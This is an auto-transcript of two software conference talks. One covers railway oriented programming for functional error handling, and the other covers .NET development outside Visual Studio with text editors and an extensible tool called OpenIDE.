compile. Right. So it's, you might say, yes, it's annoying, but it's actually less annoying to think up front of everything go wrong. Yeah, question. Yes. Yes. Yes. Because like I said, you can put data inside. So the email, you could just have an email error of and then specific individual emails. Yeah, exactly. You can organize. I'm deliberately making it very flat, but you could totally make it hierarchical if you want. And you could have different levels at different service boundaries within one set, you know, within one level, you can be very fine grained like with a database. At the database service, you might have, you know, authentication error, timeout error, whatever that gets rolled up into a generic database error for the user interface or something. So yes, you can map between errors at service boundaries. Okay. What I also like about this is it triggers conversations about what errors there are because when you're coding, typically you don't even know what these are when you're starting to code. But as you code, you say, oh, what happens if the database times out? What happens if I get an authorization error? You put that in this list to make your code compile and then you go back to your product owner or your UI designer or whoever it is who's helping to manage the product, even if it's you. And you think, well, how do I, you know, what do I show on the screen when I get a database authorization error? So it really forces good conversations with the rest of the team about how you handle errors, which I think is really valuable because one of the problems, again, you think of the happy path that you don't focus on designing for errors. And you might just say, okay, well, I'll just show a generic error message, but you know, maybe the ops team want to know that you've got an authorization error. Maybe that's useful for them. So maybe you'll handle that in a special way. Once you do this thing, we've lost the strings, right? Originally we had an error as a string in the message, the failure case had a string. But now what we need to do is we need to turn the error code into a string. So now we have this ugly, long-winded method. You know, if the name is not blank, then return the string. Name is not blank. If it's email is not blank, return the string. Email is not blank and so on. So again, that seems awfully long and tedious. But I actually think this is a good thing. Counter-intuitively, because one thing is that all your error strings are in one place, right? You don't have them scattered throughout your code, like a lot of apps do. You don't have any strings in your code anywhere except this very, very end. So only the very last step, do you need to do the turn things into strings? And if you're doing unit tests, you don't need to. So it's really just for the user interface that you need to turn them into strings. And what's nice about this is you can use different strings for different purposes. So if I'm logging it, I might log super fine detail about, you know, user authentication error with this connection string, whatever. And if I'm displaying on the user interface, the string that I return might be, you know, sorry, customer not found or something. So you have a lot of control over different error messages for different contexts. And finally, it makes translation trivial. I don't know if any of you have tried to localize an existing legacy system. But the first thing you have to do is find all your strings scattered around your code base and try and turn them into resource IDs. And, you know, it's a pain. In this model, all your strings in one place in the very last step before the UI. So it's a lot easier to translate. Yes. Is it an anti pattern to override two strings on the choice type? You could, is an anti pattern to override two string on the choice type? Yes. Because I think the translation should be context dependent. So what I'd probably do is use different functions. I'd say convert two string in the UI context, convert two string in the error logging context, convert two string in the ops notification context or something. You know, different contexts might need different, you know, for example, in the ops logging context, I might not bother to log the validation errors. It's like, I don't care. But maybe I do because maybe that's telling me that my UI has got a bug in it, or maybe it's too hard to use or something. I don't know, you know, or it's not doing client side validation. If you get these server side validation errors, that means my client's not validating properly. But the thing is, it's a choice. So let's review this. It's a documentation of everything go wrong. It's type safe. You can't go out of date. It surfaces hidden requirements. It means your testing is now testing against error codes. So rather than testing, let's say I'm testing my validation logic, you know, I can say, I would expect that if I pass in an empty name that I get a name must not be blank error rather than a looking for a string called name is not blank. So it makes my test less brittle. And finally, it makes translations easier. So that's designing for errors. Let's look at parallel tracks now. So if we take our validation logic, here we have the name not blank, followed by the name has to be 50 characters, followed by the email not blank. Now in this model, they're in serial mode. So, you know, I submit my name, it's not blank, I get an error. So I try again, and this time it's too long. And try again, this time, you know, it'd be nice if I could run them all at power and get all the validation errors at the same time. So how do you do that? Well, what you want to do is you want to parallelize these switches. So what you do is you submit the input, you run them all, and then you combine the output. And if any of them have an error, the overall output is an error. And only if they're all successful is the overall output successful. Makes sense, yeah? So how do you actually do that? Well, it turns out you don't have to write complicated functions. You can actually write a function that just adds two things together. So if you can write a function that adds two things together, and outputs a new thing, that will actually allow you to do everything. So what you generally do is write a simple ad that says, again, if they're both successful, returns a success, if anyone has a failure, return failure. And the way you combine them then is you combine three of them by combining two of them, that gives you a new one, you combine those two, and that gives you a new one. So you can collapse a list of the switches into a single switch. All right? And that pattern is what you might call the monoid pattern. Okay? Anyone heard of monoids? Yes? A few people? So I have a post called Monoids Without Tears, which might explain that. But anyway, that's one of the benefits of using monoids is you can collapse lists of things down into one thing. And the thing that you get, the output is the same thing. So you've got a switch, you've got a bunch of switches as the input, and you end up with one switch as the output. So again, you cannot tell what you did. You know, this final switch is the result of combining the other switches. Right, domain events. So we've talked about error handling so far, but sometimes you don't have an error, you just want to notify somebody that something happened. So let's say your email address changed, you just want to notify somebody, or you just want to log something, right? So in this model, there's nothing saying that you can't put messages on the success track as well. So along with your objects that you process on this, you have a list of notifications, messages that you put on. So for example, in this case, I'm going to have, let's say, a user saved successfully event, or an email sent event, and I'm going to pass that into the COM to say, oh, I just sent the user an email. You just put it on the success track rather than the failure track. So our success track now, not only does it have the entity, but it has a list of messages. All right, please straightforward. Okay, final joke. Why can't a train driver be electrocuted? Because he's not a conductor. All right, so I haven't got time to cover all the topics. Things I haven't covered is errors across service boundaries, like we're talking about how fine-grained are the errors at different levels. How to do async. So everything I did here was synchronous, right? In reality, a real system would be asynchronous. You wouldn't be waiting around for the database to return. You wouldn't be waiting around for the SNTP server to return. Compensating transactions. So if you get a, you write to the database, and then later on downstream, you need to undo that. Well, then trying to do a two-phase commit, you can do what's called a compensating transaction, just write straight out of accounting. And things like logging. I haven't had a chance to talk about that, but I think it's pretty straightforward how it works. So just to summarize, you start with a two-track results. You use bind to turn it into these two-track railway things. You glue them together with composition, and you make error cases first-class citizens. Now, what's the time? How many time left? Two minutes. Two minutes. Okay. There is a piece of example code at GitHub, which I can demonstrate. And I think I can just maybe just spend one minute just showing you that it's not totally fake. So here is the controller. This is the, I'll show you the C-sharp controller first. So this is a typical C-sharp controller. There is the get, the original get method, and there is the get method with error handling. So there's this error, and then there's this error, and the whole thing's wrapped in a tri-catch block and so on and so forth. And the f-sharp controllers look like this. And there is the successful case, and there is the error handling case. So I've got some extra stuff in there, like logging and so on, which I didn't have in the original case. And you can actually make both cases look identical just by doing some renames. So that's the, I put in some no-ups. I just put some aliases in which, like, logging a failure doesn't do anything. So that's an example of the successful case, and that's an example of the failure case. So it is true that you can make the code look identical. In this example, I actually make, I try to make the code look different just so that it's not too confusing. So I can give them slightly different names. Right. Where are we? So I don't always have errors, but when I do, I use Monads. And I will suggest that you can actually use well-wanted programming instead. So there you go, well-wanted programming. The slides are available at my website, slash R-O-P. If you want help with f-sharp, come and ask me. And there's the example code on GitHub. Thanks very much. Any questions before you all dash off? No? Come and ask me. Come and grab me. I'm around. Cheers. Thank you. Thank you.
When you build real world applications, you are not always on the "happy path". You must deal with validation, logging, network and service errors, and other annoyances. How do you manage all this within a functional paradigm, when you can't use exceptions, or do early returns, and when you have no stateful data? This talk will demonstrate a common approach to this challenge, using a fun and easy-to-understand "railway oriented programming" analogy. You'll come away with insight into a powerful technique that handles errors in an elegant way using a simple, self-documenting design.
10.5446/50641 (DOI)
Okay, so I think we're going to start here. I am happy to see so many of you chose to come here. At the end of my talk, you might think that I am a raving lunatic, but that's okay. So we're going to do something quite different from the usual way of working with.NET. Now, we are going to look at how we're going to work with.NET outside of Wyshle Studio. You can probably see from the OS that I'm running that this is not going to be like the typical talk. So I'm just going to say we are not going to talk about monodevolve today. We are not going to talk about sharp develop and we're not going to talk about Xamarin Studio. Those are all tools that you can use as substitutes for Wyshle Studio. But I'm not going to talk about writing.NET code in the typical Wyshle Studio kind of way. So those tools will enable you to work with.NET code in fairly much the same way that you do inside Wyshle Studio. What I'm going to look at is I'm going to take a different approach. I'm going to take the approach that a lot of the time when I see people picking up new technologies, like a few years back, the first time I saw people trying out node, what happened was that this was a language you were not familiar with at all, familiar with JavaScript. But what you could do, you could pick up any text editor, you could jump in there, you could write like three lines of code, and then you jump to the terminal and you write node and the name of the file and you hit enter and stuff comes out. That is awesome. You went from trying a new thing, you used familiar tools and you got feedback immediately. So that is the kind of approach I want with.NET 2. So you can try to do this. You can jump into the terminal, you can create a directory called myproject, you go in there, you do vim, space, myproject.cs, and you hit enter and you go read the specification for the Visual Studio project files and after five minutes you're going to be back in Visual Studio because that is an absolutely terrible experience. I'm not going to dive too much into why that is a terrible experience, but basically Microsoft felt that they should take all the problems in the world and fit it into one file. So if we're going to do.NET development outside of Visual Studio, we need to be able to handle that because without that we won't get anywhere. So to kind of give you my background to why I ended up doing this because I haven't been inside Visual Studio for the last two years. So I was writing a tool called autotest.net and together with Greg Young we wrote a tool called Mighty Moose or a continuous test. The responsibility of that tool was to whenever I change your file, it will pick up the changes from this, it will figure out okay so which project should I build now, it will build the projects, it would go in and analyze the DLLs, figure out okay based on the changes that I just made, what tests could possibly be affected and then it'll only run those tests. So that means what I have handled for me now is that as soon as the file changes on disk my stuff gets built and my tests get run. So we made the terrible mistake of thinking that let's create a Visual Studio extension for this and that's six months of my life that I'm never going to get back. So what kept happening frequently is that I did something in the plug-in and broke Visual Studio, everything shut down so I couldn't fix it. So I would open up Notepad, wall things, imagine. I'd open up the thing, I'll change the file and I would open up the standalone run or continuous test. So as soon as I save the file on Notepad it starts running in the background and then I could fix the bug. Like if there was some compiler it'll show up, tell me the line, I'll go there, fix the stuff and go back. And that kind of made me think okay this could actually work. I can deal with this. So I decided to completely jump out and I want all of you when you watch me today forget everything you know about Visual Studio because when I jumped out I made a decision. Okay so I am going to start working in a plain text editor. I will experience pain. When I experience pain I will make a rational decision. Am I experiencing pain because I am an idiot? Which happened way too often or am I experiencing pain because there's a process here that I need to automate? And then I would want to drive the way I am working like that. Instead of thinking okay these are all the things I am used to using. Let me try and build Visual Studio inside of Vib which is not a good idea. So okay what did I end up with? I ended up with a small tool that is called OpenID. That will help me deal with a lot of the pain that I am seeing. So this is all of OpenID. It's a few files. You have a command line interface here. You have a code engine that's going to run in the background while you sit and fiddle with your code. You have an editor engine which is going to do basic integration with an editor. And this is what you get out of the box. That is pretty much nothing. That is all that is needed for you guys to be able to do something with it. So to jump right into it now this doesn't even support C sharp as of now. So let's fix that. So we have a command called package source list. So I have some packages. Let me install the package that is up here that is called C sharp. C sharp language plugin. That sounds fairly right. Sure actually. So now I have installed that. So let me jump at and I will create a test thingy. So for OpenID to initialize it's basically the same thing as a get. As would get you do get init to initialize a get repository and you do oi init with OpenID to initialize OpenID. And I tell it that I want to initialize you and I want to work with the language C sharp which kind of tells you that you can work with all the languages inside this tool too. I hit enter. When I do oi help now I suddenly have a ton of commands. All of them come from this command called C sharp. So what I just did gave me the possibility to like we see here add files into C sharp project files. I can delete files, add references, delete references, create new classes, fixtures, interfaces, create console application and so on. And that's templated so you can create whatever you want. So if I want to do anything in here now, so I'll do oi create console source my app. Just to mention that this runs on OS X Windows and Linux because the platform is up to you guys not the tool. So now I have my app thingy in here. I have a project file, a program CS and a assembly info file. So this is stuff we're fairly familiar with. So what I can do I can go into VIM if I want to. I can edit this thing. Looks familiar. I can do console. Right line. Hello, NDC. Right. Okay, so right now I don't have continuous testing here to do my build. So what do I do? Well, Microsoft.net MS build will build your project on mono. You have X build, which does the same thing. Has pretty much the same features, I think only the output is slightly different. So I can do X build source my app. Then the project files hit enter and we see nice compile code and it says zero errors, which is good. So at this point I have a debug folder. I have the executable. I can run it and I get stuff out. Okay, so this is one way of doing it. And if I was going to do it like this, it would drive me mad because I would have to. There's too much jumping around here. I don't want that. So let's close this and let's take a few steps back. So what do I want? Text editors are a religion. So for a tool to decide which text editor any of you should use would be crazy. So I want to choose the text editor. That's up to me. I need a tool that I can extend. So at some point in your career you become a stubborn ass mule. So you have your ways of working and that's how you're going to work. So when you set with a tool you want to be driving. So the tools should not tell you what you should do. You know what you're going to do. You just want to fix it. So I want a tool that I can extend to do whatever I want to do because that's how I work right now. And extending it, I also want to do, I want to choose the language I want to extend it. I don't want a tool to tell me you're going to extend it in Python. I want to choose that. So I want to choose the editor. I want to be able to extend anything and I want to be able to do that with any language. Sounds about fair, right? Let's see how that's going to work. So that was actually the purpose of OpenID when I started with it. That's where I wanted to get. So what we can do now, I can create a source, temp, end-to-see demo project. Right now I'm running on a version of OpenID here with a few packages installed that I use. I'll show, I'll put up some information on how to get the system set up just like this after the talk. But you'll see that I have a few more features. Like, first of all, when I do I init C sharp right now, which means I want to start working with a C sharp project, I have extended the part of it that does the init part. So it initialized OpenID. You created a profile, which means it kind of suggests to any of you that you can actually have several profiles inside here. So you can have a profile, you can have a profile and you can work together. What it also did, it created a Sublime project. Because I know that if I'm going to work with this now, I'm going to use Sublime right now. So I want a Sublime project. So now I can do this in OpenID. I can tell it, okay, fire up the editor. I've set Sublime as the default editor. So what it's going to do, it's going to fire up Sublime. It's going to fire up continuous tests because now I'm using the C sharp language extensions that is bundled with continuous tests. And in the background, it's going to fire up the OpenID environments. There's a couple of processes now running in the background, making sure that anything can communicate together. So what we want to do now is we want to create a console application again. So we do I create console source demo. And the head enter is going to bring the file up in the editor. You see the green there? Continuous test built it in the background. Console, right line. Now I can do something in here. And as soon as it goes green, I can jump in here and I'll have a bin auto test folder with the demo.exe in it. And now I can get the output like that. Okay, so if I were to do something stupid like this, I could save it and now it goes red. So I can bring that up with a shortcut. I can see that you expected a semi call on. The entry goes back to the right place and I can save it. So now we have a fairly good workflow. Now when we get builders, now we can navigate around and it feels a bit better. So what I'm going to do now, I'm going to add Nancy to this project, which is a lightweight web framework. As you can see, I don't use NuGet. You can use NuGet if you want to. I think that if I have so many dependencies in my project that I need a tool to manage them, I have all the problems. So basically, this gives me Nancy, a small extension for OpenID again. So I have Nancy now, so I need to reference it. So from what we saw earlier, I had some, I could do some stuff from the command line. So if I did I help C sharp, I could run reference now. I don't want to jump out to the command line to do this stuff and type a lot of things. So again, there's an extension to OpenID that will let me, let me see here, C sharp editor create. And like I said, extensions is written in the language by your choice. This thing is written in Python. It's about 160 lines of code and it makes me able to do all the things that I can do in the terminal there inside the editor. So what I can do now is fire up shortcut, ref library, Nancy, and reference library, Nancy, cell phone. So about now I should be able to just write the use things there and it should not fail. No. I can't type. That's my biggest problem. And it's green and that makes me kind of happy. So because I can't type, I am not going to type this. So now I put a Nancy cell phone server in there, which basically means my console application is now going to turn into a small web server and it's going to run on port 1234. So to make any sense of this, I need a module so I can do all that now in a new class. I'll put you in ma modules and I'm going to call that a greeter. Again, I'm not going to type this for you. So the basic all the extensions that I'm using inside here to put code in is also written in as an extension to open ID. So I can pull and answer module template in there. So I'm going to remove this and I'm going to update the constructor. And now basically I have a simple thing that if you query on the route, it's going to return hello template. So now I should be able to save this and see it fail. So now I'm writing using Nancy. That's something we could solve, right? However, I'm not going to solve it. And this is one of the things that I talked about before, like there's good pain and there's bad pain. So this is actually one, some of the pain that I want to be aware of, because I know, let's think about code stability. So I know that code that doesn't change reminds, keeps being as stable as it is. Code that changes for a known reason is considered fairly stable because you know what you're doing in there. My code changes for the reasons that the domain changes. There's a change in the domain. I want to fix this in my code and I do the change. Third party libraries change for any reason. So as soon as you update the third party library, there's going to be changes made to your code that you're not in control of. Meaning if I have to add using everywhere in my code for a third party library, I am making my code fairly unstable because my whole code base is now going to change for a reason that I am not in control of. So if I limit the usage of these libraries to kind of an isolated place, I will be at a better place. So that was something I kind of learned the hard way that I actually don't want that using there. So you can extend OpenID to do that for you, but I want to feel that pain because when I feel that pain, I'm doing something stupid. So basically what we can do now at built and we can go into this thing in Autotest demo. I remember we run it. It fires up the Nancy host. We can go over here. We can find this one and it says hello template. Okay. That's cool. Now, like I said, I want to have this kind of pain driven. I didn't want to take the usual features. So what my pain is now, and this comes from me writing a continuous testing tool is that every time I make a change here, I'm going to have to go to the terminal. So first I stop the server. I make a change. I save it. Compiles. I go back here. I start this thing. I go over here. I have five and I can see this. Now, the human brain is fairly useless at the context watching. So if you're trying to focus on a problem, get something done, and you constantly have to jump somewhere else to do a task that is related, your brain is going to suffer. It's going to take you a lot longer to understand the problem that you're working on because you all the time have to jump to other places to get interrupted. So I don't want that. So basically what I want now, I want this thing to cause, okay, let's look at this. We have events. Open ID internally has like a bunch of events which you can react to. So if we go over here now and I save the code, we see that it spits out a lot of file change events from disk, but it also spits out this. So continuous test now pushed out and went saying that odd test net finished its run and there was zero build errors and zero test filers. I can use that. There's another event up here too that says auto test net run started. Okay, so let's do this. I'm going to create a reactive script inside open ID that says run server. And the simplest way I can do this is just by using bash scripts. I'm going to do SH. I get this thing up and the way I write these scripts that I tell it first, it's going to call me with the reactive script. So the API for this whole thing is standard and then standard out. So if your language supports standard and then standard out, you can use it to extend the tool. I can tell it now. If you see this event, tell me about it. Also, if you see this event, tell me about it. So what are we going to do? If the first parameter meaning if the event is this, then, and this is why I like running on your next base system because I can do stuff like this. So pick out the processes, find the one that is running with demo.exe, take the output of that and print and print column number two. Column number two is the process idea. So take all the process ideas that you find and kill them. Okay, so now we killed anything that would run with that process and we can write out server stop. Okay. And for the one where we built and there was no compilers, we will do this. So we will run the actually we just run the executable in the bin auto test dot net slash demo dot exe. Okay, so the reactive script and they print something and they don't tell it that this is supposed to be in command. Everything is going to be put into the output listener. So there's a few sockets exposed from from open ID. One of them is the output listener. It's a plain text socket. So you can just tell net in there if you want to and see the output. So what's going to happen now is that if I save this thing, it's going to stop the server when the bill starts and going to start the server when the bill is finished. And I can go in here and I can have five it. Okay, so so now it's a bit better because I can go in here and I can say hello world. I can save it. And as soon as it finishes, I can refresh it and word actually. And I can go to the browser. So this kind of takes away some of the the pain that I would be feeling working with this code because I want to have immediate feedback. So just to kind of show the purpose of this is that like the old blacksmiths, they were working with with metal and their tools were made of metal. So naturally they would go back and they would start making their own tools to depth themselves to their own workflow. Now we're developers. We write code. That's that's what we know how to do. So basically the foundation of being a developer is writing code. On top of that, you have all the things that makes you a good developer. So your foundation is writing code so that we know how to do. Now if I have a problem here, let's say okay, I know that my team, we always defined the the get routes like this. How do you fetch the URL out of this thing? Well, you find the line that starts with get and then a quote. And then you look until you find another quote like right. How long would you take you to create a parser that kind of pull that out? Not very long. So I'm going to show you here. There's a script here that I that I wrote that took me about 10 minutes. So I'm just going to pull that package in and install query server. Just make sure that it's running. So it's running. So what that's going to do? It looks like this. So again, it's Python because I found it easy to write that in Python. So you can you can see some of the the the way you extended here. So basically when I want to get the position in the editor and what the content of the editor, I write to standard out request editor get carrot. And then I read until I get end of conversation. And then the first line is going to be which file is being editor, which position am I at? And the rest is going to be what is the contents of the the buffer. So from that, I can parse out, okay, what's going on here and I can do this. So I'm going to fire up the output listener again. So so I can go here and I do alt r and it tells me is this the URL you want to query? Yes, and sure, and I'll get Hello World out there. Actually, I can correct the error now. So I could put an L there I save and as soon as it's up, I can do alt r and it course the server. So okay, now I have a workflow that reminds me of something that I can work with. So let's move this on a bit. So so what we have here now, we have a demo project. There's good developers. We don't want our business code inside this console application that is basically a rest interface. So you want to separate that out. So the old then create library and we want demo.core hit enter we have a demo library now we can reference project demo.core. So dealing with those project file issues now is not all that bad because we can we have that integrated in Sublime right now. So okay, so we have that. So now we want a handler for this thing. So we are going to do a new class. I'm going to put you inside of demo.core slash greeters slash Norwegian. Okay, let's try this. So we're going to say now that our greeters thing is a nationality slash name. Okay, so I'm going to query this URL. I'm going to say that we want an Norwegian and we want to greet this guy. And still we get Hello World, because that's what we asked for. So since this is an enterprise language, we need an interface for absolutely everything. So we need an eye greeter. So we're going to do that. That was not what I was supposed to do. What an earth. Okay. Wait for it. There you are. That was what I was going to do. So I'm going to do a new interface. And we're going to call that an eye greeter. Okay, you hear. And then there's a lot of refactoring things that I could have put in here. I haven't. And anyone can. I haven't felt that pain to be big enough yet. Sorry. So what I can do in here, I can say greets string return. No, there's an interface. What am I doing? So string greet string name. So sublime has this featured called implement interface that kind of looks like this. So I can return if nationality is no way, then we are going to greet you in this way return high plus name. And then if we have an interface, we need a new class and we need a greeter factory. So with the greeter factory, we can have a list of eye greeters. And this is basically just to show you guys that you can write enterprise code in this thing. So don't be afraid. You can do SharePoint. I assume I would never want to. I thought it was dead. No, that was TDD. Oh, sorry. So Norwegian and then we need a get thingy here. So it's going to return an eye greeter. It's going to say get string. And we have intelligence, but it's not called that in edit text. It's called auto completion. So my own code, this worked fairly well because it's just going to be like that. So I haven't been to the intelligence. You can using the tool. But again, I haven't felt the need for it. That was one of the things that I really thought I would have to have. But the pain is no that significant. Okay, so I'm going to return a greeter. First or default. And actually what I found is that I couldn't write two words without misspelling one before. Now we can write three words. So if this thing greets this nationality, then you will return you. And this is something that I will fix because adding usings for system stuff, that is just annoying. But I didn't get around to that before this. So collections, dot generic. And we're going to need link there to dot link, blah, blah, blah. So if I were to do the true enterprise thing, now I would have a greeter factory provider, but I am not going to do that. So okay, so now we have something in here, we can go up to this greeter thingy that we, oops, wrong file. And we have here, we can say that we are going to do so return. And just get this straight. So I have a a greeter now, which is a new greeter factory. And from my code, I want to do add usings, so that I've implemented. So I can do get and I can do the nationality. And if the greeter is nothing, I will return that reading is nationality not supported. And I get intelligence for stuff that isn't even types. How cool is that? And if it's supported, we just want the what the support nationality, how you supposed to be greeted. So you have parameters dot name. What did I send into that thing? Okay, so if this works, I'm going to be amazed it didn't. So it's going to tell me I need a reference to Microsoft C sharp. Okay, if you say so. So I want to reference library other Microsoft C sharp. No, that was not what I was supposed to do. Let me just correct that. And actually, sometimes it's actually easy to just double with this one. Because I didn't get the time to write the functionality for just pulling that right over through there. So I can just add the P. You didn't see that. And we're green. So if I'm very lucky, I should be able to do Alt R and we say, how you call it? So, okay, next thing. A lot of the time I find that even though we should not like code generating code, sometimes you are going to write things that will need some scaffolding, especially in particular languages. And writing that code is just painful. I don't want to do that. So let's see what we can do in here. So let's say that we had the silly solution of saying, okay, I'm going to write a handler for each language and I'm going to type it up myself. It wouldn't be that stupid, but let's just imagine. So I have a package here that says okay, so the extensive sharp new package so I can install that again, a small Python script that is just going to do some simple templating for us. And I can open it up here. Okay, so I can say this. I want to make create a small template for a greeter get greeter. I'm going to take so it says here I can template out the namespace, the item name. So we're going to use that. Go away. We can get all of that. I paste it in here. I say that instead of the name space, I want namespace item name. And we're going to say instead of no, we're going to do a couple of question marks and same here. Okay, so this is part of what I said that everything should be extendable in here. So if I do all help new, new it was the C sharp command that came from the actual plug and I installed. So now I've gotten a greeter inside of that so you can extend the whole hierarchy just the way you want it to. So if I want to do Swedish and I'm going to do the no test TDD thing. So I'm going to first say I want Swedish and I want to say hi to this guy. Hit enter and it says nothing because I need to listen for the output. So I try that again says nationality not supported. Okay. So I go in here now I do new, new greeter. I have Swedish. I say that you are se and you will probably write it something like this. So I save it starts the server old R and I forgot to yeah, this is enterprise. So I need to find the factory. Add you there. I'll save you and this time you will give me the Swedish greeting. Okay, so it's now I can template up the system to kind of anything that makes me need to think about other things than the problem I'm trying to solve. I should be able to just take away. I'm a blacksmith here. I'm just hammering out some tools and as long as the you limit the scope of the problem. The solution is usually very simple. So instead of always thinking that for every problem I'm going to solve, I'm going to solve that problem for all the project I'm ever going to work on. Just so for one you're working on right now. Because the other solution is not going to solve the problem for any of the other project or this one. And I say that out of experience. I did that for 10 years. So. Okay, now I can do the basics things here. So. So the workflow we have right now is reminds us very much of the continuous testing workflow. Only we don't have any tests and that's kind of where I wanted to go with this because. TDD is not dead. It's just misunderstood. So sometimes you do TDD because some problems are really efficient to solve in TDD. Other times you don't use TDD, but you want the same workflow. You want to be able to just get instant feedback from your code. And doing some small tricks, you should be able to do that. So regarding TDD. What can we do about that? So again, there's a small extension, which is already in here that lets me do this. Okay, so I want to create a tested library. I want that to be demo.tested. When I do that, I get to library. I get demo tested and demo tested tests and then the reference them together and stuff. Okay, so I also want a new tested class. And I want to call you. Is that what I? One second. Tested. Yeah. So my tested class and it'll generate the class and the test fixture that is supposed to use. And sometimes Mono is not very happy. So it does things like this. No, no, that was actually me. Sometimes I'm an idiot and my system does stuff like this. Don't mind the idiot. So I have a test here. Assert that. And then a new my test. I might have broken everything. No, I didn't. Okay, so hello, the always delightful example is equal to world. So we do the TDD way we save it and it dies. And you happy that it dies, you figure out it was this line. Okay, miss a method public string. Hello. Naturally, you should not work the first time. So you know, you see the compiler disappear. Test is failing. Expected world, but was no. It enter. The method returns the wrong things. We can do world. And now it's green. Okay, so we can do TDD stuff in here and you can extend it again like the tested library tested class that fairly helpful when you do when you do things like that. So I'm going to show you another quick little thing that I find quite useful because I write you eyes that looks like they're supposed to be used in the terminal. I don't understand graphic design. I will I understand it when I see it and I see, oh, that's looks cool. But when I try to create it, it looks terrible. So let's have the fun of seeing me do some you I stuff. So basically what I'm going to show you is again, then extending something to do something powerful is very simple. That's what we do. So I'm going to go inside the source thing here. I have a so I'm going to create a project like that. And I have a small command which will let me generate a small single page application using jQuery and handlebars. Okay, so now I have this thing in here. So I can fire up the editor. Let me get rid of some of these things. At this point, I could actually create a profile that wasn't C sharp that so I wouldn't have to have the testing tools and stuff popping up because now I'm doing front end work. So you can do that. You could write some intelligence stuff or type navigation stuff for JavaScript fairly easily. But what I'm going to do is that I'm going to open the index HTML, I'm going to open the index.js. And there's a funny dot CSS file in there. So basically how this thing works, I'm just going to let me start team up here. So I can okay, so I'm going to fire up the XSP that's the like the the is express thingy for for mono. So just fire up a simple web server which is going to listen on port 8080. And do this. And it says hello world because this is just the handlebars templating so it looks like this include handlebars. Here's the template data. Hello data world blah, blah, blah, blah, the JavaScript. And then I go in here and I do the things that I cannot do. And I say my class something. Create the CSS thingy here. And say background color because that's the only one I know. I should be able to do this. I can do UI. So last time I did UI, this was very annoying for me because I had tons of navigation and it was I had to go to where the CSS was wrong. And it was always wrong. And I looked at it. I went in I changed it. I went back, refresh the page. And I have to navigate and still wrong. Then I started hacking it in Chrome. And then I forgot to pull the changes back from Chrome. It was just a nightmare. So I did something that took me again 20 minutes to write. This is an extension written in node. So it's called dumb hack. Basically what it does is starts up a web socket server. I'll just write it. A web socket server running in the background so I can communicate with the Azure. So let me just go up here and start the output listener. So basically what I have to do, I have to go into this thing and I'll insert a template here called web socket client. So just a basic web socket client. I'll go down here. I insert a function. And this is just basic stuff. So you go into document style sheets. You just remove the one that's there from before and you add the one that you want in there. I saved this. I pray that I didn't break anything because this is web stuff. So if I did, I'm going to have to go home. So I should be able to do this now and I refresh the page and it says connected. Okay. So now I can go inside here and I can say orange. It'll do that. Okay. So now I can just sit in text editor and it's going to pull out the buffer change events and it's going to go into the browser and just update the stuff on the fly. And this is like 20 minutes of my time to make that pain go away. So confine the problem down to something that is fairly simple and very specific to the solution you need to do and just make it go away. So I can do all the things here. I can do border. I know this one too. It's border style, right? Solid. I'm good. No, I can't do the blinking. So this will let us work fairly efficiently inside just the plain text editor. So one of my points a bit earlier where that stop doing that was that okay. So I'm using supply. That shouldn't mean that you guys should be using supply. Okay. So right now I can do this. So I can do I editor almost. Okay. So I get Vim up. It's going to start continuous tests in the background like it did before. I can bring up my horrible windforms thing. So this is the full back UI. So you're going to see this in the Vim plugin because I don't understand when I need someone to write me a plugin that actually works, but that shouldn't take more than like a date. This guy in the front here is going to write an Emacs plugin and it probably shouldn't take him more than a day, he said. And I believe that. So I can open my program here and I can save the file and again, continuous tests will run in the background. I should be able to go to my greetings, my greeter here. I should be able to do alt R brings this thing up. I should be able to do again. This is horrible windforms things that we need to get rid of. We're going to do this. Come on. Don't mess with me now. Let me start this thing. They might be able to see that, but too. Yeah. So again. And we can get the same stuff working. We can also put this thing over here. We can refresh the browser. We can open the CSS file and we start typing in here. We should get the changes. Okay. So this is work fairly well between the different editors. Let me just see how much time I got left. I don't get tenants. I'm going to do some cool stuff. Okay. So I wrote in a few other small things that can that's actually quite useful. Now we have scripts. Yes. So that makes this cool thing redundant. But I'm going to show you guys it anyway. So basically I want to do some fiddling in C sharp. So I can do I try out try to some is again a small extension. When I fire this thing up, it's going to fire up Vim because I've chosen that to be the triad editor and it's going to for continuous tests. And again, it's always the same sample console right line. Hello. Oh, and DC. I save it's going to build in the background and then it's going to spit out the the evaluations. This is like in sad and attempt of a repellency sharp. But it comes quite in handy when you set and just want to throw something out. So that works for Python and PHP to for those of you who wants to do that. So I have one one last thing that I want to say and that's one of the surprising pain points that I that I encountered. There was two things that I thought I had to get support for. First one was intelligence turned out was not that important. The second one that I found was a debugger. And that kind of surprised me. And I'm not saying that you don't need that you don't need a debugger because you do. We need debuggers to fight non trivial bugs. So basically what a debugger does for you is that you sit there looking at a problem. The problem is so complex that given all the information that you know about the system, you cannot figure out what is wrong with this. Okay, so you fire up the debugger, you get more information. And at one point you'll get so enough information to understand what is wrong with this code. And then you fix the bug. So how I see us using debuggers all the time is that we wrote code yesterday that we debug today. What does that mean? It means our code is so complex that the stuff we wrote yesterday we cannot understand today. So we need an extra tool to to give it more information about the problem to be able to figure out what was going on. And there's a term for that. It's called real time legacy code. And you really see that when you jump out of Wishel Studio, you start working in an editor and then you start looking at code written by someone using a debugger. Because the only way you can reason about that type of code is if you have a debugger. So that's one of the pain points that I want to feel if I can't understand my code, there's something wrong with my code. So I need to feel that pain so that I can stop doing that. I actually think that's the thing. I'm going to leave it at that. Any questions? Yeah. It's beginning to show that you are pulling Nancy package. Yeah. Are there any practical uses for you not using Nougat or it was just an demonstration purpose? It was basically I didn't need it. So I have most of the libraries just on my machine. So the few times I use the dependencies, I pull them down in some way and put them in the project. I make very conscious decisions of when I want to update a package because I know updating a package, it's going to make my system less stable because it's going to introduce side effects that I don't know about. So that way I just haven't had the need for it. I guess a lot of other people use it. Yeah? Yes. Do you have any solution for that? Yeah. So the question was the discoverability of packages. That is quite interesting. That's like, IntelliSense is what helps you with that. And that's where you see one of the fundamental problems around the.NET community because IntelliSense is known as documentation. It's not. If you go to all the languages, like try and go. So you want to figure out something in language. There's great documentation. This is how things work. This is what you should do with this. This is not. So for that problem, I'm thinking that you could do the IntelliSense way. But I've kind of thought a bit about it. And I don't think that that is the way I would want to represent it. Because when I'm looking at an API like that, I want to discover something. I probably want to represent it like something of a structure where I can kind of move up and down. I think maybe if you're editor was supplying, you could probably do a second panel. Yeah. And have a complex sensitive to go and look up the relevant documentation. And that could be a plugin that could fairly easily be written. Either that or you can just push it up in a browser and. I have no idea. Any other questions? Yeah. How well does this play with stuff like Omnishop, which will actually do the 